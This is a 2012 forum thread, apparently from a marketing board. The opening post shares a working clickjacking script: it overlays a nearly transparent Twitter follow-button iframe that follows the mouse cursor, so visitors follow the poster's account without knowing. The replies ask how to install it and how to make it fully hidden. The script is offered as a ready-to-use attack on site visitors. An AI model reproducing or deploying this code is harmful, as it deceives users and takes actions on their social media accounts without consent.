45.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

10-08-2012, 06:22 PM
Post: #1
[GET] [Script] Twitter Clickjacking
This script will make whoever visits your site automatically follow you on twitter, without them knowing.
All you have to do is change "your_username" (end of second line) to your username.

Code:
Magic Button :

<iframe class="twitter-follow-button" allowtransparency="true" frameborder="0" scrolling="no"
src="http://platform.twitter.com/widgets/follow_button.html?screen_name=your_username"
style="width:75px; height:20px;">
</iframe>

<script>
if (!document.getElementsByClassName){
document.getElementsByClassName = function(classname){
for (i=0; i<document.getElementsByTagName("*").length; i++)
{
if (document.getElementsByTagName("*").item(i).className == classname){
return new Array(document.getElementsByTagName("*").item(i));
}
}
}
}

var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';
//twitterFollowIframe.style.width = '110px';

/*
// cross domain restriction won't allow this
twitterFollowIframe.onload = function() {
twitterFollowIframe.contentWindow.scrollTo(20, 0);
}
*/

document.onmousemove = function(e){
if ( !e ) e = window.event;
twitterFollowIframe.style.left = e.clientX - 20;
twitterFollowIframe.style.top = e.clientY - 10;
}
</script>

This is not fully hidden



SOURCE:

http://etechforum.com/showthread.php?tid=589
10-25-2012, 09:19 AM
Post: #2
RE:
Can it be used in blogspot also?
10-25-2012, 02:44 PM (This post was last modified: 10-25-2012 02:46 PM by CharlieBrown.)
Post: #3
RE:
Thanks for the share, but you do have to click the referral link to get full script.
10-25-2012, 04:48 PM
Post: #4
RE:
thanks for the share, but where do we put this code? Sorry not so techie
10-31-2012, 12:19 AM
Post: #5
RE:
Thanks, how to make fully hidden?
41.gif
11-21-2012, 06:02 PM
Post: #6
RE:
Thanks for the share, but where do we put this code???? Plz Guide me.i have a WP Site.




79.gif
Free counters!